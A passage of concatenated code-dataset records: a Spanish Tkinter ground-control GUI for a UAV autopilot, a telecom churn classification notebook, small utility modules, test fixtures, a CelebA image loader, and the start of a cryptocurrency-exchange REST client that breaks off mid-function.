self.Principal.Qgc.Control.PID_Heading.Kp = float(self.kp.get())\n self.Principal.Qgc.Control.PID_Heading.Ki = float(self.ki.get())\n self.Principal.Qgc.Control.PID_Heading.Kd = 
float(self.kd.get())\n\n elif self.variable.get()==\"Rumbo\":\n self.Principal.Qgc.Control.PID_Heading_Rumbo.Kp = float(self.kp.get())\n self.Principal.Qgc.Control.PID_Heading_Rumbo.Ki = float(self.ki.get())\n self.Principal.Qgc.Control.PID_Heading_Rumbo.Kd = float(self.kd.get())\n\n elif self.variable.get()==\"Altitud\":\n self.Principal.Qgc.Control.PID_Altitud.Kp = float(self.kp.get())\n self.Principal.Qgc.Control.PID_Altitud.Ki = float(self.ki.get())\n self.Principal.Qgc.Control.PID_Altitud.Kd = float(self.kd.get())\n\n elif self.variable.get()==\"Roll\":\n self.Principal.Qgc.Control.PID_Roll.Kp = float(self.kp.get())\n self.Principal.Qgc.Control.PID_Roll.Ki = float(self.ki.get())\n self.Principal.Qgc.Control.PID_Roll.Kd = float(self.kd.get())\n\n elif self.variable.get()==\"Pitch\":\n self.Principal.Qgc.Control.PID_Pitch.Kp = float(self.kp.get())\n self.Principal.Qgc.Control.PID_Pitch.Ki = float(self.ki.get())\n self.Principal.Qgc.Control.PID_Pitch.Kd = float(self.kd.get())\n\n else:\n self.Principal.Qgc.Control.PID_AirSpeed.Kp = float(self.kp.get())\n self.Principal.Qgc.Control.PID_AirSpeed.Ki = float(self.ki.get())\n self.Principal.Qgc.Control.PID_AirSpeed.Kd = float(self.kd.get())\n\n def set(self,*args):\n self.kp.delete(0, 50)\n self.ki.delete(0, 50)\n self.kd.delete(0, 50)\n if self.variable.get()==\"Heading\":\n self.kp.insert(0,str(self.Principal.Qgc.Control.PID_Heading.Kp))\n self.ki.insert(0,str(self.Principal.Qgc.Control.PID_Heading.Ki))\n self.kd.insert(0,str(self.Principal.Qgc.Control.PID_Heading.Kd))\n\n elif self.variable.get()==\"Rumbo\":\n self.kp.insert(0,str(self.Principal.Qgc.Control.PID_Heading_Rumbo.Kp))\n self.ki.insert(0,str(self.Principal.Qgc.Control.PID_Heading_Rumbo.Ki))\n self.kd.insert(0,str(self.Principal.Qgc.Control.PID_Heading_Rumbo.Kd))\n\n elif self.variable.get()==\"Altitud\":\n self.kp.insert(0,str(self.Principal.Qgc.Control.PID_Altitud.Kp))\n self.ki.insert(0,str(self.Principal.Qgc.Control.PID_Altitud.Ki))\n self.kd.insert(0,str(self.Principal.Qgc.Control.PID_Altitud.Kd))\n\n elif self.variable.get()==\"Roll\":\n self.kp.insert(0,str(self.Principal.Qgc.Control.PID_Roll.Kp))\n self.ki.insert(0,str(self.Principal.Qgc.Control.PID_Roll.Ki))\n self.kd.insert(0,str(self.Principal.Qgc.Control.PID_Roll.Kd))\n\n elif self.variable.get()==\"Pitch\":\n self.kp.insert (0,str(self.Principal.Qgc.Control.PID_Pitch.Kp))\n self.ki.insert (0,str(self.Principal.Qgc.Control.PID_Pitch.Ki))\n self.kd.insert (0,str(self.Principal.Qgc.Control.PID_Pitch.Kd))\n\n else:\n self.kp.insert (0,str(self.Principal.Qgc.Control.PID_AirSpeed.Kp))\n self.ki.insert (0,str(self.Principal.Qgc.Control.PID_AirSpeed.Ki))\n self.kd.insert (0,str(self.Principal.Qgc.Control.PID_AirSpeed.Kd))\n\n def Sumar(self,opcion):\n paso=0.5\n if opcion==0:\n Valor_kp=float(self.kp.get())+paso\n self.kp.delete(0, 50)\n self.kp.insert (0,str(Valor_kp))\n elif opcion==1:\n Valor_ki = float(self.ki.get()) + paso\n self.ki.delete(0, 50)\n self.ki.insert (0,str(Valor_ki))\n else:\n Valor_kd = float(self.kd.get()) + paso\n self.kd.delete(0, 50)\n self.kd.insert (0,str(Valor_kd))\n\n def Restar(self,opcion):\n paso=0.5\n if opcion==0:\n Valor_kp=float(self.kp.get())-paso\n self.kp.delete(0, 50)\n self.kp.insert (0,str(Valor_kp))\n elif opcion==1:\n Valor_ki = float(self.ki.get()) - paso\n self.ki.delete(0, 50)\n self.ki.insert (0,str(Valor_ki))\n else:\n Valor_kd = float(self.kd.get()) - paso\n self.kd.delete(0, 50)\n self.kd.insert (0,str(Valor_kd))\n\n\n\nclass Pagina_Mission():\n def 
__init__(self,raiz,Qgc,Frame_principal):\n self.Qgc=Qgc\n self.Principal=Frame_principal\n miframe = Toplevel(raiz)\n miframe.title(\"Mission Creator\")\n\n # ------------------------------------------------\n # -----------------Cajas texto--------------------\n # ------------------------------------------------\n self.Metros = Entry(miframe)\n self.Metros.grid(row=1, column=7)\n self.Latitud = Entry(miframe)\n self.Latitud.grid(row=2, column=7)\n self.Longitud = Entry(miframe)\n self.Longitud.grid(row=3, column=7)\n self.Velocidad = Entry(miframe)\n self.Velocidad.grid(row=4, column=7)\n self.FM = Entry(miframe)\n self.FM.grid(row=5, column=7)\n # ------------------------------------------------\n # -----------------Labels-------------------------\n # ------------------------------------------------\n Label(miframe, text=\"Metros:\").grid(row=2, column=6)\n Label(miframe, text=\"Latitud:\").grid(row=1, column=6)\n Label(miframe, text=\"Longitud:\").grid(row=3, column=6)\n Label(miframe, text=\"Velocidad:\").grid(row=4, column=6)\n Label(miframe, text=\"FM:\").grid(row=5, column=6)\n # ------------------------------------------------\n # -----------------Botones------------------------\n # ------------------------------------------------\n self.Save = Button(miframe, text=\" Save \",command=self.save,bg='white')\n self.Save.grid(row=6, column=6)\n self.Add = Button(miframe, text=\" Add \",command=self.add,bg='white')\n self.Add.grid(row=6, column=7)\n self.Delete = Button(miframe, text=\" Delete \",command=self.delete,bg='white')\n self.Delete.grid(row=6, column=8)\n # ------------------------------------------------\n # -----------------Texto--------------------------\n # ------------------------------------------------\n self.Texto=Text(miframe)\n self.Texto.config(width=20, height=10)\n self.Texto.grid(row=7,column=7)\n def save(self):\n self.Principal.Qgc=self.Qgc\n self.Principal.Mission.configure(state=NORMAL)\n\n def add(self):\n if self.Metros.get()!=\"\" and self.Latitud.get()!=\"\" and self.Longitud.get()!=\"\"and self.Velocidad.get()!=\"\"and self.FM.get()!=\"\":\n self.Qgc.Mission.append(LC.Waypoint(self.Latitud.get(),self.Longitud.get(),self.Metros.get(),self.Velocidad.get(),self.FM.get()))\n self.Texto.insert(\"insert\", str(self.Latitud.get())+str(',')+str(self.Longitud.get())+str(',')+str(self.Metros.get())+str(',')+str(self.Velocidad.get())+str(',')+str(self.FM.get())+'\\n')\n def delete(self):\n self.Qgc.Mission=[]\n self.Texto.delete(1.0,END)\n\n\nclass Pagina_Verbose():\n def __init__(self,raiz,Frame_principal):\n self.Principal=Frame_principal\n miframe = Toplevel(raiz)\n miframe.title(\"Verbose options\")\n\n\n # ------------------------------------------------\n # -----------------Variables-------------------------\n # ------------------------------------------------\n self.Heading=IntVar()\n self.Altitud=IntVar()\n self.Roll=IntVar()\n self.pitch=IntVar()\n self.Vel=IntVar()\n self.Posicion = IntVar()\n self.Heading_save=IntVar()\n self.Altitud_save=IntVar()\n self.Roll_save=IntVar()\n self.pitch_save=IntVar()\n self.Vel_save=IntVar()\n self.Posicion_save = IntVar()\n self.Clean=IntVar()\n\n # ------------------------------------------------\n # -----------------ChecButtons--------------------\n # ------------------------------------------------\n self.Check_Heading=Checkbutton(miframe, text=\"Heading\", variable=self.Heading, onvalue=1,offvalue=0)\n self.Check_Heading.pack()\n self.Check_Altitud=Checkbutton(miframe, text=\"Altitud\", variable=self.Altitud, 
onvalue=1,offvalue=0)\n self.Check_Altitud.pack()\n self.Check_Roll=Checkbutton(miframe, text=\"Roll\", variable=self.Roll, onvalue=1,offvalue=0)\n self.Check_Roll.pack()\n self.Check_Pitch=Checkbutton(miframe, text=\"Pitch\", variable=self.pitch, onvalue=1,offvalue=0)\n self.Check_Pitch.pack()\n self.Check_Vel=Checkbutton(miframe, text=\"Vel\", variable=self.Vel, onvalue=1,offvalue=0)\n self.Check_Vel.pack()\n self.Check_Posicion=Checkbutton(miframe, text=\"Posicion\", variable=self.Posicion, onvalue=1,offvalue=0)\n self.Check_Posicion.pack()\n self.Check_Heading_save=Checkbutton(miframe, text=\"Heading save\", variable=self.Heading_save, onvalue=1,offvalue=0)\n self.Check_Heading_save.pack()\n self.Check_Altitud_save=Checkbutton(miframe, text=\"Altitud save\", variable=self.Altitud_save, onvalue=1,offvalue=0)\n self.Check_Altitud_save.pack()\n self.Check_Roll_save=Checkbutton(miframe, text=\"Roll save\", variable=self.Roll_save, onvalue=1,offvalue=0)\n self.Check_Roll_save.pack()\n self.Check_Pitch_save=Checkbutton(miframe, text=\"Pitch save\", variable=self.pitch_save, onvalue=1,offvalue=0)\n self.Check_Pitch_save.pack()\n self.Check_Vel_save=Checkbutton(miframe, text=\"Vel save\", variable=self.Vel_save, onvalue=1,offvalue=0)\n self.Check_Vel_save.pack()\n self.Check_Posicion_save=Checkbutton(miframe, text=\"Posicion save\", variable=self.Posicion_save, onvalue=1,offvalue=0)\n self.Check_Posicion_save.pack()\n self.Check_Clean=Checkbutton(miframe, text=\"Clean\", variable=self.Clean, onvalue=1,offvalue=0)\n self.Check_Clean.pack()\n # ------------------------------------------------\n # -----------------Botones------------------------\n # ------------------------------------------------\n self.Save = Button(miframe, text=\" Save \",command=self.save,bg='white')\n self.Save.pack()\n self.set()\n\n def save(self):\n self.Principal.Verbose_options.Heading = self.Heading.get()\n self.Principal.Verbose_options.Altitud = self.Altitud.get()\n self.Principal.Verbose_options.Roll = self.Roll.get()\n self.Principal.Verbose_options.pitch = self.pitch.get()\n self.Principal.Verbose_options.Vel = self.Vel.get()\n self.Principal.Verbose_options.Posicion = self.Posicion.get()\n self.Principal.Verbose_options.Heading_save = self.Heading_save.get()\n self.Principal.Verbose_options.Altitud_save = self.Altitud_save.get()\n self.Principal.Verbose_options.Roll_save = self.Roll_save.get()\n self.Principal.Verbose_options.pitch_save = self.pitch_save.get()\n self.Principal.Verbose_options.Vel_save = self.Vel_save.get()\n self.Principal.Verbose_options.Posicion_save = self.Posicion_save.get()\n self.Principal.Verbose_options.Clean = self.Clean.get()\n\n def set(self):\n self.Heading.set(self.Principal.Verbose_options.Heading)\n self.Altitud.set(self.Principal.Verbose_options.Altitud)\n self.Roll.set(self.Principal.Verbose_options.Roll)\n self.pitch.set(self.Principal.Verbose_options.pitch)\n self.Vel.set(self.Principal.Verbose_options.Vel)\n self.Posicion.set(self.Principal.Verbose_options.Posicion)\n self.Heading_save.set(self.Principal.Verbose_options.Heading_save)\n self.Altitud_save.set(self.Principal.Verbose_options.Altitud_save)\n self.Roll_save.set(self.Principal.Verbose_options.Roll_save)\n self.pitch_save.set(self.Principal.Verbose_options.pitch_save)\n self.Vel_save.set(self.Principal.Verbose_options.Vel_save)\n self.Posicion_save.set(self.Principal.Verbose_options.Posicion_save)\n self.Clean.set(self.Principal.Verbose_options.Clean)\n\nclass Pagina_Plots():\n def __init__(self,raiz,fig):\n miframe 
= Toplevel(raiz)\n miframe.title(\"Plots\")\n if fig is not None:\n canvas = FigureCanvasTkAgg(fig, master=miframe)\n plot_widget = canvas.get_tk_widget()\n plot_widget.pack(side=TOP, fill=BOTH, expand=1)\n else:\n miframe.destroy()\n\n\nclass Pagina_Comm():\n def __init__(self,raiz,main):\n miframe = Toplevel(raiz)\n miframe.title(\"Config\")\n self.main=main\n # ------------------------------------------------\n # -----------------Variables-------------------------\n # ------------------------------------------------\n self.Port_send=StringVar()\n self.Port_recv=StringVar()\n self.IP=StringVar()\n # ------------------------------------------------\n # -----------------Labels-------------------------\n # ------------------------------------------------\n Label(miframe,text=\"Port_send: \").grid(row=1, column=1)\n Label(miframe,text=\"Port_recv: \").grid(row=2, column=1)\n Label(miframe,text=\"IP: \").grid(row=3, column=1)\n # ------------------------------------------------\n # -----------------Entry-------------------------\n # ------------------------------------------------\n self.Port_send_entry = Entry(miframe,textvariable=self.Port_send)\n self.Port_send_entry.grid(row=1, column=2)\n self.Port_recv_entry = Entry(miframe,textvariable=self.Port_recv)\n self.Port_recv_entry.grid(row=2, column=2)\n self.IP_entry = Entry(miframe,textvariable=self.IP)\n self.IP_entry.grid(row=3, column=2)\n # ------------------------------------------------\n # -----------------Botones------------------------\n # ------------------------------------------------\n self.Save = Button(miframe, text=\" Save \", command=self.save, bg='white')\n self.Save.grid(row=4, column=1)\n self.set()\n\n def save(self):\n self.main.Qgc.PortAdress_send = (self.IP.get(),int(self.Port_send.get()))\n self.main.Qgc.PortAdress_recv = (self.IP.get(),int(self.Port_recv.get()))\n print(self.main.Qgc.PortAdress_recv)\n self.main.Qgc.sock.bind(self.main.Qgc.PortAdress_recv)\n\n def set(self):\n recv = str(self.main.Qgc.PortAdress_recv).split(\",\")\n send = str(self.main.Qgc.PortAdress_send).split(\",\")\n Port_send=send[1].rstrip(')')\n Port_recv=recv[1].rstrip(')')\n Ip=recv[0].lstrip('(')\n self.Port_send.set(Port_send)\n self.Port_recv.set(Port_recv)\n self.IP.set(Ip)\n\nclass Pagina_IA():\n def __init__(self,raiz,main):\n miframe = Toplevel(raiz)\n miframe.title(\"Config\")\n self.main=main\n # ------------------------------------------------\n # -----------------Botones------------------------\n # ------------------------------------------------\n self.Load_IA = Button(miframe, text=\" Load IA \", command=self.Load, bg='white')\n self.Load_IA.grid(row=1, column=1)\n self.Load_IA_default = Button(miframe, text=\" Load IA Default \", command=self.Load_default, bg='white')\n self.Load_IA_default.grid(row=2, column=1)\n\n\n def Load(self):\n Modelo = filedialog.askopenfilename(title=\"Abrir modelo\")\n try:\n cnn = LC.load_model(Modelo)\n self.main.Qgc.Modelo=cnn\n self.main.AutoLand.configure(state=NORMAL)\n self.main.Vision = LV.Vision(self.main.Qgc.Cola, self.main.Qgc.Modelo, self.main.Texto)\n print('Cargado')\n except:\n print('Fallo al cargar el modelo')\n self.main.AutoLand.configure(state=DISABLED)\n\n def Load_default(self):\n Modelo = r'C:\\Users\\Juatarto\\Desktop\\TFM\\Arquitecturas\\Test\\Epoca_10\\Modelo_Capas_6_RGB_Epocas_10_Neuronas_256_Filtros_32_relu.h5'\n try:\n cnn = load_model(Modelo)\n self.main.Qgc.Modelo=cnn\n # self.main.Qgc.Modelo._make_predict_function() #IMPORTANTISIMO esto genera el grafo en la GPU 
para evitar que la primera vez que se llama a predict() sea muy lento\n self.main.Vision = LV.Vision(self.main.Qgc.Cola, self.main.Qgc.Modelo, self.main.Texto)\n self.main.AutoLand.configure(state=NORMAL)\n if self.main.Qgc.Mission is not None:\n self.main.Mission.configure(state=NORMAL)\n self.main.Texto.insert(\"insert\", \"Modelo IA cargado correctamente\\n\")\n print('Cargado')\n except:\n print('Fallo al cargar el modelo')\n self.main.AutoLand.configure(state=DISABLED)\n\n\nclass Hoja_ruta():\n def __init__(self,raiz,Mission):\n self.miframe = Toplevel(raiz)\n self.Mision=Mission\n self.Labels = []\n self.label=Label(self.miframe, text=\"Plan de vuelo\").grid(row=0, column=1)\n self.Init()\n\n def Init(self):\n x=1\n for waypoint in self.Mision:\n self.Printear(waypoint,x)\n x+=1\n\n def Printear(self,waypoint,numero):\n if waypoint.Flight_mode==0:\n Text=\"Despegue\"\n elif waypoint.Flight_mode==1:\n Text=\"Navegacion\"\n elif waypoint.Flight_mode==2:\n Text=\"Aterrizaje autonomo\"\n elif waypoint.Flight_mode==3:\n Text=\"Aterrizaje\"\n self.Labels.append(Label(self.miframe, text=Text,borderwidth=2, relief=\"groove\"))\n self.Labels[numero-1].grid(row=numero, column=1)\n\n def Actualizar_waypoint(self,numero,Fin=False):\n if Fin==True:\n Label = self.Labels[numero - 1]\n Label.config(bg=\"green\")\n else:\n Label=self.Labels[numero]\n Label.config(bg=\"orange\")\n if numero>0:\n Label = self.Labels[numero-1]\n Label.config(bg=\"green\")\n def salir(self):\n self.miframe.destroy()\n","sub_path":"Autopiloto_Def/Libreria_GUI.py","file_name":"Libreria_GUI.py","file_ext":"py","file_size_in_byte":40841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"235269205","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # PREDICTING TELECOM CHURN\n\n# In[42]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n# In[43]:\n\n\n# Importing the dataset\ndataset = pd.read_csv('/Users/vandy/Desktop/WA_Fn-UseC_-Telco-Customer-Churn.csv')\n#X = dataset.iloc[:, [2,3]].values\n#y = dataset.iloc[:, 20].values\ndataset.head()\n\n\n# In[44]:\n\n\ndataset['newMonthlyCharges']=[1 if x>43 else 0 for x in dataset['MonthlyCharges']]\n\n\n# In[45]:\n\n\ndataset\n\n\n# In[46]:\n\n\n# Import label encoder \nfrom sklearn import preprocessing \nlabel_encoder = preprocessing.LabelEncoder()\ndataset['MultipleLines']= label_encoder.fit_transform(dataset['MultipleLines']) \ndataset['MultipleLines'].unique() \n\ndataset['InternetService']= label_encoder.fit_transform(dataset['InternetService']) \ndataset['InternetService'].unique() \n\ndataset['gender']= label_encoder.fit_transform(dataset['gender']) \ndataset['gender'].unique() \n\ndataset['Partner']= label_encoder.fit_transform(dataset['Partner']) \ndataset['Partner'].unique() \n\ndataset['Dependents']= label_encoder.fit_transform(dataset['Dependents']) \ndataset['Dependents'].unique() \n\ndataset['StreamingMovies']= label_encoder.fit_transform(dataset['StreamingMovies']) \ndataset['StreamingMovies'].unique() \n\ndataset['Churn']= label_encoder.fit_transform(dataset['Churn']) \ndataset['Churn'].unique() \n\n\n# In[47]:\n\n\nX = dataset.iloc[:, [5,21]].values\ny = dataset.iloc[:, 20].values\ndataset.head()\n\n\n# In[48]:\n\n\n# Splitting the dataset into the Training set and Test set\n# from sklearn.cross_selection import train_test_split\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 
0)\n\n\n# In[49]:\n\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n\n# In[50]:\n\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import GridSearchCV\nKNN=KNeighborsClassifier()\n\n\n# # KNN\n\n# In[51]:\n\n\nparam_grid=[{'n_neighbors':[3,5,10,15]}]\ngrid_search_KNN=GridSearchCV(KNN,param_grid,cv=5)\ngrid_search_KNN.fit(X_train, y_train)\n\n\n# In[52]:\n\n\ngrid_search_KNN.best_params_\n\n\n# In[53]:\n\n\ncvres_KNN=grid_search_KNN.cv_results_\nfor mean_score,params in zip(cvres_KNN[\"mean_test_score\"],cvres_KNN[\"params\"]):\n print(mean_score,params)\n\n\n# In[54]:\n\n\n# Prediction with KNN classifier\n\nfrom sklearn.neighbors import KNeighborsClassifier\nclassifier1 = KNeighborsClassifier(n_neighbors = 15, metric='minkowski', p=2)\nclassifier1.fit(X_train, y_train)\n# Predicting the Test set results\ny_pred = classifier1.predict(X_test)\ndf=pd.DataFrame(y_pred)\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\nprint(\"confusion matrix:\")\nprint(cm)\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nprint('Accuracy Score: ',accuracy_score(y_test,y_pred))\nprint('--------------')\nprint(classification_report(y_test,y_pred))\n\n\n# In[55]:\n\n\ny_pred\n\n\n# # Random Forest\n\n# In[56]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import roc_auc_score\n\nRF=RandomForestClassifier(random_state=123)\n\n\n# In[57]:\n\n\nfrom sklearn.model_selection import GridSearchCV\nparam_grid=[{'n_estimators':[4,5,10,20,50]}]\ngrid_search_RF=GridSearchCV(RF,param_grid,cv=5)\ngrid_search_RF.fit(X_train, y_train)\n\n\n# In[58]:\n\n\ngrid_search_RF.best_params_\n\n\n# In[59]:\n\n\ncvres_RF=grid_search_RF.cv_results_\nfor mean_score,params in zip(cvres_RF[\"mean_test_score\"],cvres_RF[\"params\"]):\n print(mean_score,params)\n\n\n# In[60]:\n\n\n# Prediction with Random Forest classifier\nfrom sklearn.ensemble import RandomForestClassifier\nclassifier2 = RandomForestClassifier(n_estimators = 4, criterion='entropy', random_state = 0)\nclassifier2.fit(X_train, y_train) \n# Predicting the Test set results\ny_pred = classifier2.predict(X_test)\ndf=pd.DataFrame(y_pred)\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\nprint(\"confusion matrix:\")\nprint(cm)\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nprint('Accuracy Score: ',accuracy_score(y_test,y_pred))\nprint('--------------')\nprint(classification_report(y_test,y_pred))\n\n\n# # SVM\n\n# In[61]:\n\n\n# Prediction with SVM classifier\n# Fitting SVM to the Training set\nfrom sklearn.svm import SVC\nclassifier3 = SVC(kernel = 'linear', random_state = 0)\nclassifier3.fit(X_train, y_train)\n# Predicting the Test set results\ny_pred = classifier3.predict(X_test)\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\nprint(\"confusion matrix:\")\nprint(cm)\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nprint('Accuracy Score: ',accuracy_score(y_test,y_pred))\nprint('--------------')\nprint(classification_report(y_test,y_pred))\n\n\n# # Decision Tree\n\n# 
In[62]:\n\n\n# Prediction with Decision Tree classifier\nfrom sklearn.tree import DecisionTreeClassifier\nclassifier4 = DecisionTreeClassifier(criterion='entropy', random_state = 0)\nclassifier4.fit(X_train, y_train) \n# Predicting the Test set results\ny_pred = classifier4.predict(X_test)\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\nprint(\"confusion matrix:\")\nprint(cm)\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nprint('Accuracy Score: ',accuracy_score(y_test,y_pred))\nprint('--------------')\nprint(classification_report(y_test,y_pred))\n\n\n# # Naive Bayes\n\n# In[63]:\n\n\n# Prediction with naive_bayes classifier\nfrom sklearn.naive_bayes import GaussianNB\nclassifier5 = GaussianNB()\nclassifier5.fit(X_train, y_train) \n# Predicting the Test set results\ny_pred = classifier5.predict(X_test)\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\nprint(\"confusion matrix:\")\nprint(cm)\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nprint('Accuracy Score: ',accuracy_score(y_test,y_pred))\nprint('--------------')\nprint(classification_report(y_test,y_pred))\n\n\n# # Plotting a bar Graph between the accuracy of all 3 algorithms :\n\n# In[64]:\n\n\nacc=[]\n\n\n# In[65]:\n\n\nacc.append(classifier1.score(X_test, y_test))\nacc.append(classifier2.score(X_test, y_test))\nacc.append(classifier3.score(X_test, y_test))\nacc.append(classifier4.score(X_test, y_test))\nacc.append(classifier5.score(X_test, y_test))\n\n\n# In[66]:\n\n\nacc_name=['KNN','Random Forest','SVM','Decision Tree','Naive Bayes']\n\n\n# In[67]:\n\n\ncolours=['b','r','g','c','m']\nplt.xlabel('machine learning algorithms',fontsize=15)\nplt.ylabel('Accuracy',fontsize=15)\nplt.title('Accuracy Comparisions',fontsize=15)\nplt.bar(acc_name,acc,color=colours,width=0.5)\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Predicting Telecom Churn/Telecom_Analysis(Using 2 Features).py","file_name":"Telecom_Analysis(Using 2 Features).py","file_ext":"py","file_size_in_byte":7052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"459150064","text":"#-*- coding: UTF-8 -*-\n\nimport numpy as np\n\nfrom IMaterial import IMaterial\n\nclass Color(IMaterial):\n\n\tdef __init__(self, r, g, b, a):\n\t\tself.__color = np.array((r,g,b,a), dtype=np.float32)\n\n\tdef get(self):\n\t\treturn self.__color\n\nColor.RED \t= Color(1,0,0,1)\nColor.GREEN = Color(0,1,0,1)\nColor.BLUE \t= Color(0,0,1,1)\nColor.WHITE\t= Color(1,1,1,1)\nColor.ROYALBLUE\t= Color(65/255.0,105/255.0,225/255.0,1)\nColor.BLACK = Color(0,0,0,1)","sub_path":"src/model/Color.py","file_name":"Color.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465525827","text":"# For files submitted to Marx, data containing test cases should go\n# in a single list contained in a separate file. The list can contain\n# whatever you want it to contain, but everything has to be within\n# that one list. 
Marx will split that list when it distributes the\n# code to the Worker Machines for execution.\n\ndata = [\n (1, 2, 'alpha', 3.4, True),\n (5, 6, 'beta', 7.8, False),\n (9, 10, 'gamma', 11.12, True),\n (13, 14, 'delta', 15.16, False)\n]\n","sub_path":"example_1/data_file.py","file_name":"data_file.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448404337","text":"from datetime import datetime\nimport random\n\nimport pymongo\nimport pytest\n\nfrom flaskr import create_app\nfrom flaskr.models import Song, db\n\nPOOL_ARTIST = [\n 'Bob', 'Pool', 'Alice', 'Joy'\n]\nTITLES = [\n 'Storytime',\n 'Adrenalize',\n 'Afterlife',\n 'Goodbye Moonmen'\n]\n\n\n@pytest.fixture\ndef random_song_generator():\n def generator():\n song = Song(\n artist=random.choice(POOL_ARTIST),\n title=random.choice(POOL_ARTIST),\n difficulty=random.uniform(0, 15),\n level=random.randint(0, 15),\n released=datetime.now().replace(microsecond=0),\n )\n song.save()\n return song\n\n return generator\n\n\n@pytest.fixture\ndef client():\n app = create_app(test_config={\n 'MONGOALCHEMY_DATABASE': 'test_db',\n 'TESTING': True,\n })\n client = app.test_client()\n\n db.session.db.Song.remove()\n db.session.db.Song.create_index(\n [('artist', pymongo.TEXT), ('title', pymongo.TEXT)]\n )\n yield client\n","sub_path":"integration_tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"483210395","text":"import numpy as np\nimport scipy.misc\nfrom glob import glob\nimport fnmatch\nimport time\nimport os\n\n\ndef center_crop(image, input_h, input_w, resize_h, resize_w):\n h, w = image.shape[:2]\n j = int(round((h - input_h)/2.))\n i = int(round((w - input_w)/2.))\n return scipy.misc.imresize(image[j:j+input_h, i:i+input_w], [resize_h, resize_w])\n\n\ndef make_generator(pathnames, n_files, batch_size, crop=True):\n epoch_count = [1]\n def get_epoch():\n images = np.zeros((batch_size, 3, 64, 64), dtype='int32')\n files = np.arange(n_files)\n random_state = np.random.RandomState(epoch_count[0])\n random_state.shuffle(files)\n epoch_count[0] += 1\n for n, i in enumerate(files):\n image = scipy.misc.imread(\"{}\".format(pathnames[i]))\n \n if crop:\n image = center_crop(image, 178, 178, 64, 64)\n else:\n image = scipy.misc.imresize(image, [64, 64])\n \n images[n % batch_size] = image.transpose(2,0,1)\n if n > 0 and n % batch_size == 0:\n yield (images,)\n return get_epoch\n\ndef load(batch_size, data_dir, crop=True):\n pathnames_train = glob(os.path.join(data_dir, 'train', '*.jpg'))\n pathnames_val = glob(os.path.join(data_dir, 'test', '*.jpg'))\n\n return (\n make_generator(pathnames_train, len(pathnames_train), batch_size, crop=crop),\n make_generator(pathnames_val, len(pathnames_val), batch_size, crop=crop)\n )\n\nif __name__ == '__main__':\n train_gen, valid_gen = load(64)\n t0 = time.time()\n for i, batch in enumerate(train_gen(), start=1):\n #print(\"{}\\t{}\".format(str(time.time() - t0), batch[0][0,0,0,0]))\n if i == 1000:\n break\n t0 = time.time()\n","sub_path":"igul222_GANs/tflib/load_celebA.py","file_name":"load_celebA.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"90025705","text":"import requests\nimport time\nimport datetime\nimport hashlib\nimport hmac\nimport base64\nimport json\nfrom enum import 
Enum\n\nfrom decimal import Decimal\nfrom .version import __version__ as version\n\nagent = requests.Session()\n\n\nclass OrderType(Enum):\n MARKET = 'market_order'\n LIMIT = 'limit_order'\n\n\nclass TimeInForce(Enum):\n FOK = 'fok'\n IOC = 'ioc'\n GTC = 'gtc'\n\n\nclass DeltaRestClient:\n\n def __init__(self, base_url, api_key=None, api_secret=None):\n self.base_url = base_url\n self.api_key = api_key\n self.api_secret = api_secret\n\n # Check if payload and query are working\n def request(self, method, path, payload=None, query=None, auth=False):\n url = '%s/%s' % (self.base_url, path)\n if auth:\n if self.api_key is None or self.api_secret is None:\n raise Exception('Api_key or Api_secret missing')\n timestamp = get_time_stamp()\n signature_data = method + timestamp + '/' + path + \\\n query_string(query) + body_string(payload)\n signature = generate_signature(self.api_secret, signature_data)\n req_headers = {\n 'api-key': self.api_key,\n 'timestamp': timestamp,\n 'signature': signature,\n 'User-Agent': 'rest-client',\n 'Content-Type': 'application/json'\n }\n else:\n req_headers = {'User-Agent': 'rest-client'}\n\n res = requests.request(\n method, url, data=body_string(payload), params=query, timeout=(3, 27), headers=req_headers\n )\n\n res.raise_for_status()\n return res\n\n def get_product(self, product_id):\n response = self.request(\"GET\", \"products\")\n response = response.json()\n products = list(\n filter(lambda x: x['id'] == product_id, response))\n return products[0] if len(products) > 0 else None\n\n def batch_create(self, product_id, orders):\n response = self.request(\n \"POST\",\n \"orders/batch\",\n {'product_id': product_id, 'orders': orders},\n auth=True)\n return response\n\n def create_order(self, order):\n response = self.request('POST', 